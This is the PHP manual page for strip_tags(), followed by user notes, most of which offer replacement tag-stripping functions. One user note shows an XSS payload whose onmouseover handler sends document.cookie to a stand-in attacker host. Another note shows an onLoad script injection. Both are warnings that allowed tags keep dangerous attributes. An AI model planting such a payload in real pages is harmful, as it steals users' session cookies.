strip_tags

(PHP 4, PHP 5, PHP 7, PHP 8)

strip_tags - Strip HTML and PHP tags from a string

Description

strip_tags ( string $str , string $allowable_tags = ? ) : string

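This function tries to return the given string str with all NULL bytes, HTML and PHP tags stripped. It uses the same tag-stripping state machine as the fgetss() function.

Parameters

str: The input string.
allowable_tags: An optional second parameter listing the tags that should not be stripped.

Note:
HTML comments and PHP tags are also stripped. This is hardcoded and cannot be changed with the allowable_tags parameter.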

Note:
In PHP 5.3.4 and later, self-closing XHTML tags are ignored and only non-self-closing tags should be used in allowable_tags. For example, to allow both <br> and <br/>, you should use:

<?php strip_tags($input, '<br>'); ?>
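As a quick check of the note above, the sketch below lists only `<br>` in allowable_tags and feeds in three spellings of the tag. The input string and variable names are made up for illustration, and the behavior described assumes PHP 5.3.4 or later.

```php
<?php
// Illustrative input: the same tag written three ways, plus a <b> tag
// that is not in the allow-list.
$input = 'one<br>two<br/>three<br />four<b>!</b>';

// Only the non-self-closing form is listed in allowable_tags.
$output = strip_tags($input, '<br>');

// All three <br> spellings survive; the <b> tags are removed.
echo $output, "\n";
```

Listing `<br/>` or `<br />` instead would not be expected to help, since self-closing forms in allowable_tags are ignored.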

Return Values

Returns the stripped string.

Changelog

Version	Description
5.3.4	strip_tags() ignores self-closing XHTML tags in `allowable_tags`.
5.0.0	strip_tags() is now binary safe.

Examples

Example #1 strip_tags() example


<?php
$text = '<p>Test paragraph.</p><!-- Comment --> <a href="#fragment">Other text</a>';
echo strip_tags($text);
echo "\n";

// Allow <p> and <a>
echo strip_tags($text, '<p><a>');
?>

The above example will output:

Test paragraph. Other text
<p>Test paragraph.</p> <a href="#fragment">Other text</a>

Notes

Warning

Because strip_tags() does not actually validate the HTML, partial or broken tags can cause more text to be removed than expected.
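A minimal sketch of that data loss, assuming a hypothetical user comment that contains a literal `<` directly followed by another character. It also shows htmlspecialchars() as one alternative when the goal is simply to display the text safely rather than to remove markup.

```php
<?php
// Hypothetical user text containing a literal "<" that is not a tag.
$comment = 'Sale: <50% off today';

// strip_tags() treats "<50% off today" as the start of an unclosed tag,
// so that part of the text is lost.
$stripped = strip_tags($comment);

// Escaping keeps every character and still renders as plain text in HTML.
$escaped = htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');

var_dump($stripped);
var_dump($escaped);
```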

Warning

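This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes, which a malicious user may abuse when posting text that will be shown to other users.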
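The sketch below illustrates the warning with a made-up submission: an allowed tag keeps its event-handler attribute untouched. The second half shows one conservative option for cases where no markup needs to survive at all; it is an illustration, not a complete sanitizer.

```php
<?php
// Hypothetical hostile submission: an allowed tag carrying an event handler.
$submitted = '<p onmouseover="alert(1)">hover me</p>';

// <p> is allowed, so the tag passes through with its attribute intact.
$kept = strip_tags($submitted, '<p>');

// Conservative alternative when no markup is needed: strip every tag,
// then escape whatever remains before echoing it into a page.
$plain = htmlspecialchars(strip_tags($submitted), ENT_QUOTES, 'UTF-8');

var_dump(strpos($kept, 'onmouseover') !== false); // attribute is still there
echo $plain, "\n";
```

If some tags must be kept, an allow-list of attributes enforced through a DOM parser or a dedicated sanitizing library is the safer direction.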

Note:
Tag names in the input HTML that are longer than 1023 bytes are treated as invalid, regardless of the allowable_tags parameter.

See Also

htmlspecialchars() - Convert special characters to HTML entities

User Contributed Notes

abe 24-May-2021 05:30


Note that strip_tags() removes anything that looks like a tag, not just actual tags. If an attribute value contains tags, they may be removed too.

For example:

    <?php
    $test = '<div a="abc <b>def</b> hij" b="1">x<b>y</b>z</div>';
    echo strip_tags($test, "<div><b>");

will result in

   <div a="abc bdef/b hij" b="1">x<b>y</b>z</div>

roger dot keulen at vaimo dot com 09-Sep-2019 12:01


https://bugs.php.net/bug.php?id=78346



After upgrading from v7.3.3 to v7.3.7 it appears nested "php tags" inside a string are no longer being stripped correctly by strip_tags().



This is still working in v7.3.3, v7.2 & v7.1. I've added a simple test below.



Test script:

---------------

<?php

$str = '<?= \'<?= 1 ?>\' ?>2';

var_dump(strip_tags($str));



Expected result:

----------------

string(1) "2"



Actual result:

--------------

string(5) "' ?>2"

D Mo 16-Apr-2018 12:23


When processing a large batch of strings, stripping tags together with their content using regular expressions is very slow. This function may help:



<?php

/**

 * Removes passed tags with their content.

 *

 * @param array $tagsToRemove List of tags to remove

 * @param string $haystack String to clean up

 * @return string

 */

function removeTagsWithTheirContent(array $tagsToRemove, $haystack)

{

    $currTag = '';

    $currPos = false;



    $initSearch = function (&$currTag, &$currPos, $tagsToRemove, $haystack) {

        $currTag = '';

        $currPos = false;

        foreach ($tagsToRemove as $tag) {

            $tempPos = stripos($haystack, '<'.$tag);

            if ($tempPos !== false && ($currPos === false || $tempPos < $currPos)) {

                $currPos = $tempPos;

                $currTag = $tag;

            }

        }

    };



    $substri_count = function ($haystack, $needle, $offset, $length) {

        $haystack = strtolower($haystack);

        // lowercase the needle too, so the count stays case-insensitive

        $needle = strtolower($needle);

        return substr_count($haystack, $needle, $offset, $length);

    };



    $initSearch($currTag, $currPos, $tagsToRemove, $haystack);

    while ($currPos !== false) {

        $minTagLength = strlen($currTag) + 2;

        $tempPos = $currPos + $minTagLength;

        $tagEndPos = stripos($haystack, '</'.$currTag.'>', $tempPos);

        // process nested tags

        if ($tagEndPos !== false) {

            $nestedCount = $substri_count($haystack, '<' . $currTag, $tempPos, $tagEndPos - $tempPos);



            for ($i = $nestedCount; $i > 0; $i--) {

                $lastValidPos = $tagEndPos;

                $tagEndPos = stripos($haystack, '</' . $currTag . '>', $tagEndPos + 1);

                if ($tagEndPos === false) {

                    $tagEndPos = $lastValidPos;

                    break;

                }

            }

        }



        if ($tagEndPos === false) {

            // invalid html, end search for current tag

            $tagsToRemove = array_diff($tagsToRemove, [$currTag]);

        } else {

            // remove current tag with its content

            $haystack = substr($haystack, 0, $currPos)

                // get string after "</$tag>"

                .substr($haystack, $tagEndPos + strlen($currTag) + 3);

        }



        $initSearch($currTag, $currPos, $tagsToRemove, $haystack);

    }



    return $haystack;

}

?>

Anonymous 05-Apr-2017 12:05


This is just bzplan's function, with an option to choose what tags are replaced with.



function rip_tags($string, $rep = ' ') { 

    

    // ----- remove HTML TAGs ----- 

    $string = preg_replace ('/<[^>]*>/', $rep, $string); 

    

    // ----- remove control characters ----- 

    $string = str_replace("\r", '', $string);    // --- replace with empty space

    $string = str_replace("\n", $rep, $string);   // --- replace with space

    $string = str_replace("\t", $rep, $string);   // --- replace with space

    

    // ----- remove multiple spaces ----- 

    $string = trim(preg_replace('/ {2,}/', $rep, $string));

    

    return $string; 



}

stever at starburstpublishing dot com dot au 19-Sep-2016 06:09


Since strip_tags does not remove attributes and thus creates a potential XSS security hole, here is a small function I wrote to allow only specific tags with specific attributes and strip all other tags and attributes.



If you only allow formatting tags such as b, i, and p, and styling attributes such as class, id and style, this will strip all javascript including event triggers in formatting tags.



Note that allowing anchor tags or href attributes opens another potential security hole that this solution won't protect against. You'll need more comprehensive protection if you plan to allow links in your text.



<?php
function stripUnwantedTagsAndAttrs($html_str){
  $xml = new DOMDocument();
  // Suppress warnings: proper error handling is beyond the scope of this example
  libxml_use_internal_errors(true);
  // List the tags you want to allow here. NOTE: you MUST allow html and body, otherwise the entire string will be cleared
  $allowed_tags = array("html", "body", "b", "br", "em", "hr", "i", "li", "ol", "p", "s", "span", "table", "tr", "td", "u", "ul");
  // List the attributes you want to allow here
  $allowed_attrs = array ("class", "id", "style");
  if (!strlen($html_str)){return false;}
  if ($xml->loadHTML($html_str, LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD)){
    // Copy the live node list into an array first: removing nodes while
    // iterating a live DOMNodeList causes elements to be skipped
    foreach (iterator_to_array($xml->getElementsByTagName("*"), false) as $tag){
      if (!in_array($tag->tagName, $allowed_tags)){
        if ($tag->parentNode){
          $tag->parentNode->removeChild($tag);
        }
      }else{
        // The attribute map is live as well, so iterate over a copy
        foreach (iterator_to_array($tag->attributes, false) as $attr){
          if (!in_array($attr->nodeName, $allowed_attrs)){
            $tag->removeAttribute($attr->nodeName);
          }
        }
      }
    }
  }
  return $xml->saveHTML();
}
?>

Trititaty 14-Dec-2015 09:28


Features:

* allowable tags (as in strip_tags),

* optional stripping attributes of the allowable tags,

* optional comment preserving,

* deleting broken and unclosed tags and comments,

* optional callback function call for every piece processed allowing for flexible replacements.



<?php

function better_strip_tags( $str, $allowable_tags = '', $strip_attrs = false, $preserve_comments = false, callable $callback = null ) {

  $allowable_tags = array_map( 'strtolower', array_filter( // lowercase

      preg_split( '/(?:>|^)\\s*(?:<|$)/', $allowable_tags, -1, PREG_SPLIT_NO_EMPTY ), // get tag names

      function( $tag ) { return preg_match( '/^[a-z][a-z0-9_]*$/i', $tag ); } // filter broken

  ) );

  $comments_and_stuff = preg_split( '/(<!--.*?(?:-->|$))/', $str, -1, PREG_SPLIT_DELIM_CAPTURE );

  foreach ( $comments_and_stuff as $i => $comment_or_stuff ) {

    if ( $i % 2 ) { // html comment

      if ( !( $preserve_comments && preg_match( '/<!--.*?-->/', $comment_or_stuff ) ) ) {

        $comments_and_stuff[$i] = '';

      }

    } else { // stuff between comments

      $tags_and_text = preg_split( "/(<(?:[^>\"']++|\"[^\"]*+(?:\"|$)|'[^']*+(?:'|$))*(?:>|$))/", $comment_or_stuff, -1, PREG_SPLIT_DELIM_CAPTURE );

      foreach ( $tags_and_text as $j => $tag_or_text ) {

        $is_broken = false;

        $is_allowable = true;

        $result = $tag_or_text;

        if ( $j % 2 ) { // tag

          if ( preg_match( "%^(</?)([a-z][a-z0-9_]*)\\b(?:[^>\"'/]++|/+?|\"[^\"]*\"|'[^']*')*?(/?>)%i", $tag_or_text, $matches ) ) {

            $tag = strtolower( $matches[2] );

            if ( in_array( $tag, $allowable_tags ) ) {

              if ( $strip_attrs ) {

                $opening = $matches[1];

                $closing = ( $opening === '</' ) ? '>' : $matches[3];

                $result = $opening . $tag . $closing;

              }

            } else {

              $is_allowable = false;

              $result = '';

            }

          } else {

            $is_broken = true;

            $result = '';

          }

        } else { // text

          $tag = false;

        }

        if ( !$is_broken && isset( $callback ) ) {

          // allow result modification

          call_user_func_array( $callback, array( &$result, $tag_or_text, $tag, $is_allowable ) );

        }

        $tags_and_text[$j] = $result;

      }

      $comments_and_stuff[$i] = implode( '', $tags_and_text );

    }

  }

  $str = implode( '', $comments_and_stuff );

  return $str;

}

?>



Callback arguments:

* &$result: contains the text to be placed instead of the original piece (e.g. an empty string for forbidden tags); it can be changed;

* $tag_or_text: original piece of text or a tag (see below);

* $tag: false for text between tags, lowercase tag name for tags;

* $is_allowable: boolean telling whether a tag is allowed (to avoid double checking), always true for text between tags.

Callback function isn't called for comments and broken tags.



Caution: the function doesn't fully validate tags (much less the HTML itself); it just forcibly strips those that are obviously broken, in addition to stripping forbidden tags. If you want to get valid tags, use the strip_attrs option, though it doesn't guarantee that tags are balanced or used in the appropriate context. For complex logic, consider using a DOM parser.

Dr. Gianluigi "Zane" Zanettini 22-Oct-2015 07:52


A word of caution. strip_tags() can actually be used for input validation as long as you remove ALL tags. As soon as you accept a single tag (2nd parameter), you are opening up a security hole such as this:



<acceptedTag onLoad="javascript:malicious()" />



Plus: regexing away attributes or code blocks is really not the right solution. For effective input validation when strip_tags() accepts even a single tag, http://htmlpurifier.org/ is the way to go.

doug at exploittheweb dot com 11-Aug-2015 10:17


"5.3.4    strip_tags() no longer strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags."



This is poorly worded.



The above seems to be saying that, since 5.3.4, if you don't specify "<br/>" in allowable_tags then "<br/>" will not be stripped... but that's not actually what they're trying to say.



What it means is, in versions prior to 5.3.4, it "strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags", and that since 5.3.4 this is no longer the case.



So what reads as "no longer strips self-closing tags (unless the self-closing XHTML tag is also given in allowable_tags)" is actually saying "no longer (strips self-closing tags unless the self-closing XHTML tag is also given in allowable_tags)".



i.e.



pre-5.3.4: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br>' // strips <br/> because it wasn't explicitly specified in allowable_tags



5.3.4 and later: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br><br/>' // does not strip <br/> because PHP matches it with <br> in allowable_tags

valentin dot boschatel at evalandgo dot com 26-May-2015 09:41


Hi,



I have a problem with this function. I want to use the < symbol in my text, but it doesn't work when a character immediately follows the symbol.

Example:

<?php

$test = '<p><span style="color: #ff0000; background-color: #000000;">Complex</span> <span style="font-family: impact,chicago;">text <50% </span> <a href="http://exempledomain.com/"><em>with</em></a> <span style="font-size: 36pt;"><strong>tags</strong></span></p>';



echo strip_tags($test);

// Outputs : Complex text

?>



I made a function for this :



Function: 

<?php

function strip_tags_review($str, $allowable_tags = '') {



    preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($allowable_tags), $tags);

    $tags = array_unique($tags[1]);



    if(is_array($tags) AND count($tags) > 0) {

        $pattern = '@<(?!(?:' . implode('|', $tags) . ')\b)(\w+)\b.*?>(.*?)</\1>@i';

    }

    else {

        $pattern = '@<(\w+)\b.*?>(.*?)</\1>@i';

    }



    $str = preg_replace($pattern, '$2', $str);

    return preg_match($pattern, $str) ? strip_tags_review($str, $allowable_tags) : $str;

}



echo strip_tags_review($test);

// Outputs: Complex text <50%  with tags



echo strip_tags_review($test, '<a>');

// Outputs: Complex text <50%  <a href="http://exempledomain.com">with</a> tags

?>

fernando at zauber dot es 10-Nov-2014 11:45


As you probably know, the native strip_tags() function doesn't work very well with malformed HTML when you use the allowed tags parameter.

This is a very simple but effective function to remove html tags. It takes a list (array) of allowed tags as second parameter:



<?php

function flame_strip_tags($html, $allowed_tags=array()) {

  $allowed_tags=array_map('strtolower',$allowed_tags);

  $rhtml=preg_replace_callback('/<\/?([^>\s]+)[^>]*>/i', function ($matches) use (&$allowed_tags) {        

    return in_array(strtolower($matches[1]),$allowed_tags)?$matches[0]:'';

  },$html);

  return $rhtml;

}

?>



The function works reasonably well with invalid or badly formatted HTML.



Use:



<?php

$allowed_tags=array("h1","a");

$html=<<<EOD

<h1>Example</h1>

<dt><a href='/manual/en/getting-started.php'>Getting Started</a></dt>

    <dd><a href='/manual/en/introduction.php'>Introduction</a></dd>

    <dd><a href='/manual/en/tutorial.php'>A simple tutorial</a></dd>

<dt><a href='/manual/en/langref.php'>Language Reference</a></dt>

    <dd><a href='/manual/en/language.basic-syntax.php'>Basic syntax</a></dd>

    <dd><a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a></dd>

</dl>

EOD;

echo flame_strip_tags($html,$allowed_tags);

?>



The output will be:



<h1>Example</h1>

<a href='/manual/en/getting-started.php'>Getting Started</a>

<a href='/manual/en/introduction.php'>Introduction</a>

<a href='/manual/en/tutorial.php'>A simple tutorial</a>

<a href='/manual/en/langref.php'>Language Reference</a>

<a href='/manual/en/language.basic-syntax.php'>Basic syntax</a>

<a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a>

bnt dot gloria at outlook dot com 10-Jul-2014 03:52


With allowable_tags, strip_tags() is not safe.



<?php



$str= "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";

$str= strip_tags($str, '<p>');

echo $str; // Displays: <p onmouseover="window.location='http://www.theBad.com/?cookie='+document.cookie;"> don't mouseover </p>



?>

obeyer at popsugar dot com 10-Jan-2014 11:50


Actually, for PHP 5.4.19, if you want to allow line breaks (<br>), you should pass "<br>" in allowable tags. Passing <br/> or <br /> there won't do anything, and line breaks will be stripped.

bzplan at web dot de 07-Oct-2012 07:57


a HTML code like this: 



<?php

$html = '

<div>

<p style="color:blue;">color is blue</p><p>size is <span style="font-size:200%;">huge</span></p>

<p>material is wood</p>

</div>

'; 

?>



with <?php $str = strip_tags($html); ?>

... the result is:



$str = 'color is bluesize is huge

material is wood'; 



Notice: the words 'blue' and 'size' run together :(

and the line breaks are still in the new string $str.

If you need a space between the words (and no line breaks),

use my function: <?php $str = rip_tags($html); ?>

... the result is:



$str = 'color is blue size is huge material is wood'; 



the function: 



<?php

// -------------------------------------------------------------- 



function rip_tags($string) { 

    

    // ----- remove HTML TAGs ----- 

    $string = preg_replace ('/<[^>]*>/', ' ', $string); 

    

    // ----- remove control characters ----- 

    $string = str_replace("\r", '', $string);    // --- replace with empty space

    $string = str_replace("\n", ' ', $string);   // --- replace with space

    $string = str_replace("\t", ' ', $string);   // --- replace with space

    

    // ----- remove multiple spaces ----- 

    $string = trim(preg_replace('/ {2,}/', ' ', $string));

    

    return $string; 



}



// -------------------------------------------------------------- 

?>



the KEY is the regex pattern: '/<[^>]*>/'

instead of strip_tags() 

... then remove control characters and multiple spaces

:)
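A variation on the same idea that still relies on strip_tags() itself: pad every `<` with a space before stripping, then collapse whitespace. This is only a sketch; the function name `strip_tags_spaced` is hypothetical, and the approach also inserts spaces around inline tags, so `a<b>b</b>c` becomes `a b c`.

```php
<?php
// Hypothetical helper: strip tags but keep words from adjacent blocks apart.
function strip_tags_spaced(string $html): string
{
    // Put a space in front of every "<" so text on both sides of a tag
    // stays separated once the tag is removed.
    $spaced = str_replace('<', ' <', $html);

    $text = strip_tags($spaced);

    // Collapse runs of whitespace (spaces, tabs, line breaks) into one space.
    return trim(preg_replace('/\s+/', ' ', $text));
}

$html = '<p>color is blue</p><p>size is <span>huge</span></p>';
$result = strip_tags_spaced($html);
echo $result, "\n";
```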

tom at cowin dot us 27-Aug-2010 07:04


With most web based user input of more than a line of text, it seems I get 90% 'paste from Word'. I've developed this fn over time to try to strip all of this cruft out. A few things I do here are application specific, but if it helps you - great, if you can improve on it or have a better way - please - post it... 





<?php





    function strip_word_html($text, $allowed_tags = '<b><i><sup><sub><em><strong><u><br>')


    {


        mb_regex_encoding('UTF-8');


        //replace MS special characters first


        $search = array('/&lsquo;/u', '/&rsquo;/u', '/&ldquo;/u', '/&rdquo;/u', '/&mdash;/u');


        $replace = array('\'', '\'', '"', '"', '-');


        $text = preg_replace($search, $replace, $text);


        //make sure _all_ html entities are converted to the plain ascii equivalents - it appears


        //in some MS headers, some html entities are encoded and some aren't


        $text = html_entity_decode($text, ENT_QUOTES, 'UTF-8');


        //try to strip out any C style comments first, since these, embedded in html comments, seem to


        //prevent strip_tags from removing html comments (MS Word introduced combination)


        if(mb_stripos($text, '/*') !== FALSE){


            // mb_ereg patterns take no delimiters; the 'm' option lets "." match newlines
            $text = mb_eregi_replace('/\*.*?\*/', '', $text, 'm');


        }


        //introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be


        //'<1' becomes '< 1'(note: somewhat application specific)


        $text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);


        $text = strip_tags($text, $allowed_tags);


        //eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one


        $text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);


        //strip out inline css and simplify style tags


        $search = array('#<(strong|b)\b[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)\b[^>]*>(.*?)</(em|i)>#isu', '#<u\b[^>]*>(.*?)</u>#isu');


        $replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');


        $text = preg_replace($search, $replace, $text);


        //on some of the ?newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears


        //that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains


        //some MS Style Definitions - this last bit gets rid of any leftover comments


        $num_matches = preg_match_all("/\<!--/u", $text, $matches);


        if($num_matches){


              $text = preg_replace('/<!--.*?-->/su', '', $text);


        }


        return $text;


    }


?>

CEO at CarPool2Camp dot org 17-Feb-2009 11:10


Note the different outputs from different versions of the same tag:





<?php // striptags.php


$data = '<br>Each<br/>New<br />Line';


$new  = strip_tags($data, '<br>');


var_dump($new);  // OUTPUTS string(21) "<br>EachNew<br />Line"





<?php // striptags.php


$data = '<br>Each<br/>New<br />Line';


$new  = strip_tags($data, '<br/>');


var_dump($new); // OUTPUTS string(16) "Each<br/>NewLine"





<?php // striptags.php


$data = '<br>Each<br/>New<br />Line';


$new  = strip_tags($data, '<br />');


var_dump($new); // OUTPUTS string(11) "EachNewLine"


?>

mariusz.tarnaski at wp dot pl 12-Nov-2008 08:05


Hi. I made a function that removes the HTML tags along with their contents:





Function:


<?php


function strip_tags_content($text, $tags = '', $invert = FALSE) {





  preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);


  $tags = array_unique($tags[1]);


    


  if(is_array($tags) AND count($tags) > 0) {


    if($invert == FALSE) {


      return preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);


    }


    else {


      return preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);


    }


  }


  elseif($invert == FALSE) {


    return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);


  }


  return $text;


}


?>





Sample text:


$text = '<b>sample</b> text with <div>tags</div>';





Result for strip_tags($text):


sample text with tags





Result for strip_tags_content($text):


 text with 





Result for strip_tags_content($text, '<b>'):


<b>sample</b> text with 





Result for strip_tags_content($text, '<b>', TRUE);


 text with <div>tags</div>





I hope someone finds this useful :)

cesar at nixar dot org 07-Mar-2006 11:44


Here is a recursive function for strip_tags, like the one shown on the stripslashes manual page.



<?php

function strip_tags_deep($value)

{

  return is_array($value) ?

    array_map('strip_tags_deep', $value) :

    strip_tags($value);

}



// Example

$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));

$array = strip_tags_deep($array);



// Output

print_r($array);

?>
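If some tags should survive, the same recursion can carry the allowable tags along. The sketch below is one possible variant; the name `strip_tags_deep_allow` and its `$allowed` parameter are hypothetical and not part of the note above.

```php
<?php
// Hypothetical variant of strip_tags_deep() that forwards an allow-list.
function strip_tags_deep_allow($value, string $allowed = '')
{
    if (is_array($value)) {
        // Recurse into nested arrays; array_map() preserves the keys.
        return array_map(function ($item) use ($allowed) {
            return strip_tags_deep_allow($item, $allowed);
        }, $value);
    }

    // Scalars are cast to string before stripping.
    return strip_tags((string) $value, $allowed);
}

// Example: keep <b>, strip everything else.
$array = array('<b>Foo</b>', array('<i>Bar</i>', '<b>Baz</b>'));
$clean = strip_tags_deep_allow($array, '<b>');
print_r($clean);
```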